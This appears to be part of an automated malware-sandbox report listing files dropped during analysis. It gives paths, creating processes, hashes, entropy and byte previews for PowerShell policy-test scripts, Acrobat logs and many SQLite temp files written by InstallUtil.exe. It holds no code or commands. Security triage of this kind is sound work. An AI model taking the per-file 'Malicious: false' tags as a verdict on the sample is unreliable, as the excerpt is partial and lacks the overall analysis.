MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qry4ygw5.ft1.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rug3cz4t.r5t.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6 2024-12-17 02-38-29-863.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393)
Category:	dropped
Size (bytes):	16525
Entropy (8bit):	5.346011504419146
Encrypted:	false
SSDEEP:	384:BqIxwGbWz/d64bJEaE3eErgEVCjzI8K7Wq2YUYNzgzxzOupDPdz4I9j8jI/BvfDJ:5bEd3NShrMdom
MD5:	789D1F2F853618A17B73FBEF9532AB2F
SHA1:	5322D042DC96B7E30E3914F7C21729559D534D3E
SHA-256:	482DB450F9F106D18D3E1EAE7A160CC9E75201F9336327CDBCA465997BF56FB2
SHA-512:	20E8E45817B30FE1B03ABE69E71C534EF8DA2015CE237E3F93FDF932D6CDE1FD126465530B61E56A32E9D65A3A6858A1B3B00806571A232876EACAD293871629
Malicious:	false
Preview:	SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:322+0200 ThreadID=6712 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1".SessionID=2ea1274d-4863-404e-b24b-36d6ccd1bf33.1696504095322 Timestamp=2023-10-05T13:08:15:325+0200 ThreadID=6712 Component=ngl-lib_NglAppLib Description="SetConfig:

C:\Users\user\AppData\Local\Temp\acrobat_sbx\NGL\NGLClient_AcrobatReader123.6.20320.6.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with very long lines (393), with CRLF line terminators
Category:	dropped
Size (bytes):	15114
Entropy (8bit):	5.352399897534231
Encrypted:	false
SSDEEP:	384:aDbVPV4V/VKvsx7gg9Hx4KDjv5ouyK1q8/pGcLcoW802T2T3vNOr0jaQdjmjaX7/:mpmRpbY
MD5:	DFE68E746A072E3B595CC477C7B8CE0F
SHA1:	4E352502CE99D96FC570928BF801B3DC98A87EEB
SHA-256:	4E23418BAE38F3808E64F8D0EDB595BD5381AFBA9C227EBB72041153B7994DC4
SHA-512:	3B9FDF4A3A5EA59D03DCCF2571FF5F074B5D2AB0E5E43AC9B979B1EBE3E781FA2882EB2CFF538487FBE5A26FB94F2117487458BA689B4436792B3AC21D39FB29
Malicious:	false
Preview:	SessionID=cd34cb52-45c2-4712-b7e5-b4ac92dcc948.1734421109898 Timestamp=2024-12-17T02:38:29:898-0500 ThreadID=1956 Component=ngl-lib_NglAppLib Description="-------- Initializing session logs --------"..SessionID=cd34cb52-45c2-4712-b7e5-b4ac92dcc948.1734421109898 Timestamp=2024-12-17T02:38:29:899-0500 ThreadID=1956 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: No operating configs found"..SessionID=cd34cb52-45c2-4712-b7e5-b4ac92dcc948.1734421109898 Timestamp=2024-12-17T02:38:29:899-0500 ThreadID=1956 Component=ngl-lib_kOperatingConfig Description="GetRuntimeDetails: Fallback to NAMED_USER_ONLINE!!"..SessionID=cd34cb52-45c2-4712-b7e5-b4ac92dcc948.1734421109898 Timestamp=2024-12-17T02:38:29:899-0500 ThreadID=1956 Component=ngl-lib_NglAppLib Description="SetConfig: OS Name=WINDOWS_64, OS Version=10.0.19045.1"..SessionID=cd34cb52-45c2-4712-b7e5-b4ac92dcc948.1734421109898 Timestamp=2024-12-17T02:38:29:899-0500 ThreadID=1956 Component=ngl-lib_NglAppLib Description="SetConf

C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	35721
Entropy (8bit):	5.399526896805411
Encrypted:	false
SSDEEP:	192:Ncb/mILxcb2cbeLIFrcbCkcbAIp/cbVcbIIJDcbZcbCIY+cbOcbgI9zcb6K:2PLH8FVfpBJnYd9RK
MD5:	866F961450BDDEB28527F4F50E066054
SHA1:	0C8441AAD2D6CA37E09A3931428FAF876D8AE890
SHA-256:	729993B5FE953DC1E2904CAA2AA98DEBEA3809EECA830BE797CFA248B2AD0F66
SHA-512:	41C7C0E7D8DEF3774451ADAE30D3A55162904E6C899412863352CE6592F1B168D1E88BBBB799C149FB9B5023842ECF9071C09A73AE3F9CF76D3724B50F3E425A
Malicious:	false
Preview:	05-10-2023 12:57:02:.---2---..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : *************************************..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : ***********************************..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : **** Starting new session ******..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : Starting NGL..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : Setting synchronous launch...05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 ::::: Configuring as AcrobatReader1..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : NGLAppVersion 23.6.20320.6..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : NGLAppMode NGL_INIT..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : AcroCEFPath, NGLCEFWorkflowModulePath - C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1 C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow..05-10-2023 12:57:02:.AcroNGL Integ ADC-4240758 : isNGLExternalBrowserDisabled - No..05-10-2023 12:57:02:.Closing File..05-10-

C:\Users\user\AppData\Local\Temp\acrocef_low\450882fc-8416-442d-afb6-9f82210cc1db.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 33081
Category:	dropped
Size (bytes):	1407294
Entropy (8bit):	7.97605879016224
Encrypted:	false
SSDEEP:	24576:/xA7o5dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07/WLaGZDwYIGNPJe:JVB3mlind9i4ufFXpAXkrfUs0jWLaGZo
MD5:	A0CFC77914D9BFBDD8BC1B1154A7B364
SHA1:	54962BFDF3797C95DC2A4C8B29E873743811AD30
SHA-256:	81E45F94FE27B1D7D61DBC0DAFC005A1816D238D594B443BF4F0EE3241FB9685
SHA-512:	74A8F6D96E004B8AFB4B635C0150355CEF5D7127972EA90683900B60560AA9C7F8DE780D1D5A4A944AF92B63C69F80DCDE09249AB99696932F1955F9EED443BE
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\acrocef_low\b0caca89-6252-47c3-ad0f-9eb954d28e87.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 1311022
Category:	dropped
Size (bytes):	386528
Entropy (8bit):	7.9736851559892425
Encrypted:	false
SSDEEP:	6144:8OSTJJJJEQ6T9UkRm1lBgI81ReWQ53+sQ36X/FLYVbxrr/IxktOQZ1mau4yBwsOo:sTJJJJv+9UZX+Tegs661ybxrr/IxkB1m
MD5:	5C48B0AD2FEF800949466AE872E1F1E2
SHA1:	337D617AE142815EDDACB48484628C1F16692A2F
SHA-256:	F40E3C96D4ED2F7A299027B37B2C0C03EAEEE22CF79C6B300E5F23ACB1EB31FE
SHA-512:	44210CE41F6365298BFBB14F6D850E59841FF555EBA00B51C6B024A12F458E91E43FDA3FA1A10AAC857D4BA7CA6992CCD891C02678DCA33FA1F409DE08859324
Malicious:	false
Preview:	...........]s[G. Z...{....;...J$%K&..%.[..k...S....$,.`. )Z..m........a.......o..7.VfV...S..HY}Ba.<.NUVVV~W.].;qG4..b,N..#1.=1.#1..o.Fb.........IC.....Z...g_~.OO.l..g.uO...bY.,[..o.s.D<..W....w....?$4..+..%.[.?..h.w<.T.9.vM.!..h0......}..H..$[...lq,....>..K.)=..s.{.g.O...S9".....Q...#...+..)>=.....\|6......<4W.'.U.j$....+..=9...l.....S..<.\.k.'....{.1<.?..<..uk.v;.7n.!...g....."P..4.U........c.KC..w._G..u..g./.g....{'^.-\|..h#.g.\.PO.\|...]x..Kf4..s..............+.Y.....@.K....zI..X......6e?[..u.g"{..h.vKbM<.?i6{%.q)i...v..<P8P3.......CW.fwd...{:@h...;........5..@.C.j.....a.. U.5...].$.L..wW....z...v.......".M.?c.......o..}.a.9..A..%V..o.d....'..\|m.WC.....\|.....e.[W.p.8...rm....^..x'......5!...\|......z..#......X_..Gl..c..R..`...*.s-1f..]x......f...g...k........g....... ).3.B..{"4...!r....v+As...Zn.]K{.8[..M.r.Y..........+%...]...J}f]~}_..K....;.Z.[..V.&..g...>...{F..{I..@~.^.\|P..G.R>....U..../HY...(.z.<.~.9OW.Sxo.Y

C:\Users\user\AppData\Local\Temp\acrocef_low\dc5c890c-3cf2-47f1-9cda-aeedb6471468.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 299538
Category:	dropped
Size (bytes):	758601
Entropy (8bit):	7.98639316555857
Encrypted:	false
SSDEEP:	12288:ONh3P65+Tegs6121YSWBlkipdjuv1ybxrr/IxkB1mabFhOXZ/fEa+vTJJJJv+9U0:O3Pjegf121YS8lkipdjMMNB1DofjgJJg
MD5:	3A49135134665364308390AC398006F1
SHA1:	28EF4CE5690BF8A9E048AF7D30688120DAC6F126
SHA-256:	D1858851B2DC86BA23C0710FE8526292F0F69E100CEBFA7F260890BD41F5F42B
SHA-512:	BE2C3C39CA57425B28DC36E669DA33B5FF6C7184509756B62832B5E2BFBCE46C9E62EAA88274187F7EE45474DCA98CD8084257EA2EBE6AB36932E28B857743E5
Malicious:	false
Preview:	...........kWT..0...W`.........b..@..nn........5.._..I.R3I..9g.x....s.\+.J......F...P......V]u......t....jK...C.fD..]..K....;......y._.U..}......S.........7...Q.............W.D..S.....y......%..=.....e..^.RG......L..].T.9.y.zqm.Q]..y..(......Q]..~~..}..q...@.T..xI.B.L.a.6...{..W..}.mK?u...5.#.{...n...........z....m^.6!.`.....u...eFa........N....o..hA-..s.N..B.q..{..z.{=..va4_`5Z........3.uG.n...+...t...z.M."2..x.-...DF..VtK.....o]b.Fp.>........c....,..t..an[............5.1.(}..q.q......K3.....[>..;e..f.Y.........mV.cL...]eF..7.e.<.._.o\.S..Z...`..}......>@......\|.......ox.........h.......o....-Yj=.s.g.Cc\.i..\..A.B>.X..8`...P......[..O...-.g...r..u\...k..7..#E....N}...8.....(..0....w....j.......>.L....H.....y.x3...[>..t......0..z.qw..]X..i8..w.b..?0.wp..XH.A.[.....S..g.g..I.A.15.0?._n.Q.]..r8.....l..18...(.].m...!\|G.1...... .3.`./....`~......G.............\|..pS.e.C....:o.u_..oi.:..\|....joi...eM.m.K...2%...Z..j...VUh..9.}.....

C:\Users\user\AppData\Local\Temp\acrocef_low\e3ffc256-39eb-418e-988d-05f0a9d5fa01.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 5111142
Category:	dropped
Size (bytes):	1419751
Entropy (8bit):	7.976496077007677
Encrypted:	false
SSDEEP:	24576:/rwYIGNP4mOWL07oBGZ1dpy6mlind9j2kvhsfFXpAXDgrFBU2/R07D:TwZG6bWLxBGZN3mlind9i4ufFXpAXkru
MD5:	95F182500FC92778102336D2D5AADCC8
SHA1:	BEC510B6B3D595833AF46B04C5843B95D2A0A6C9
SHA-256:	9F9C041D7EE1DA404E53022D475B9E6D5924A17C08D5FDEC58C0A1DCDCC4D4C9
SHA-512:	D7C022459486D124CC6CDACEAD8D46E16EDC472F4780A27C29D98B35AD01A9BA95F62155433264CC12C32BFF384C7ECAFCE0AC45853326CBC622AE65EE0D90BA
Malicious:	false
Preview:	...........[.s.8..}.....!#..gw.n.`uNl.f6.3....d%EK.D["...#.......!)...r.$.G.......Z..u.._>.~....^e..<..u..........._D.r.Z..M.:...$.I..N.....\`.B.wj...:...E\|.P..$ni.{.....T.^~<m-..J....RQk....f.....q.......V.rC.M.b.DiL\.....wq....$&j....O.........~.U.+..So.]..n..#OJ..p./..-......<...5..WB.O....i....<./T.P.L.;.....h.ik..DT...<...j..o..fz~..~."...w&.fB...4..@[.g.......Y.>/M.".....-..N.{.2.....\....h..ER..._..(.-..o97..[.t:..>..W..0.....u...?.%...1u..fg..`.Z.....m ~.GKG.q{.vU.nr..W.%.W..#z..l.T......1.....}.6......D.O...:....PX.........R.....j.WD).M..9.Fw...W.-a..z.l\..u.^....L..^.`.T...l.^.B.DMc.d....i...o.\|M.uF\|.nQ.L.E,.b!..NG.....<...J......g.o....;&5..'a.M...l..1.V.iB2.T._I....".+.W.yA ._.......<.O......O$."C....n!H.L`..q.....5..~./.._t.......A....S..3........Q[..+..e..P;...O...x~<B........'.)...n.$e.m.:...m.....&..Y.".H.s....5.9..A5)....s&.k0,.g4.V.K.,.e....5...X.}6.P....y\.s\|..Si..BB..y...~.....D^g...7'T-.5.!K.$\...2.

C:\Users\user\AppData\Local\Temp\tmp1062.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp20B3.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8501914549146043
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBOKq/hFKipNzF23ukuE1:ThFawNLopFgU10XJBODhFKMxk1
MD5:	3BD8534EE37F707CEE75F67A6F27C5BD
SHA1:	C02E6D9D228504D8C11FD7F24D26B367AB013D46
SHA-256:	2AA70608BCC9634BD4C977584969B0FC26C5B612C3D9706290A1CDA5D55941CF
SHA-512:	30828B32AD1D9D1A71A81686133123868B34C4BC67B8E321A7B3F5E875E3C836E5BE5B6B0C458349ED88F8ECC167AF4C29C7E678DF9822E2685850FF5F45E8DE
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp2CC7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8501914549146043
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBOKq/hFKipNzF23ukuE1:ThFawNLopFgU10XJBODhFKMxk1
MD5:	3BD8534EE37F707CEE75F67A6F27C5BD
SHA1:	C02E6D9D228504D8C11FD7F24D26B367AB013D46
SHA-256:	2AA70608BCC9634BD4C977584969B0FC26C5B612C3D9706290A1CDA5D55941CF
SHA-512:	30828B32AD1D9D1A71A81686133123868B34C4BC67B8E321A7B3F5E875E3C836E5BE5B6B0C458349ED88F8ECC167AF4C29C7E678DF9822E2685850FF5F45E8DE
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp33C7.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3B75.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3DEE.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8501914549146043
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBOKq/hFKipNzF23ukuE1:ThFawNLopFgU10XJBODhFKMxk1
MD5:	3BD8534EE37F707CEE75F67A6F27C5BD
SHA1:	C02E6D9D228504D8C11FD7F24D26B367AB013D46
SHA-256:	2AA70608BCC9634BD4C977584969B0FC26C5B612C3D9706290A1CDA5D55941CF
SHA-512:	30828B32AD1D9D1A71A81686133123868B34C4BC67B8E321A7B3F5E875E3C836E5BE5B6B0C458349ED88F8ECC167AF4C29C7E678DF9822E2685850FF5F45E8DE
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3DF8.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp3F45.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp50D4.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp5CC6.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6732424250451717
Encrypted:	false
SSDEEP:	24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
MD5:	CFFF4E2B77FC5A18AB6323AF9BF95339
SHA1:	3AA2C2115A8EB4516049600E8832E9BFFE0C2412
SHA-256:	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
SHA-512:	0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmp6022.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 5
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8501914549146043
Encrypted:	false
SSDEEP:	24:TLVF1kwNbXYFpFNYcw+6UwcQVXH5fBOKq/hFKipNzF23ukuE1:ThFawNLopFgU10XJBODhFKMxk1
MD5:	3BD8534EE37F707CEE75F67A6F27C5BD
SHA1:	C02E6D9D228504D8C11FD7F24D26B367AB013D46
SHA-256:	2AA70608BCC9634BD4C977584969B0FC26C5B612C3D9706290A1CDA5D55941CF
SHA-512:	30828B32AD1D9D1A71A81686133123868B34C4BC67B8E321A7B3F5E875E3C836E5BE5B6B0C458349ED88F8ECC167AF4C29C7E678DF9822E2685850FF5F45E8DE
Malicious:	false
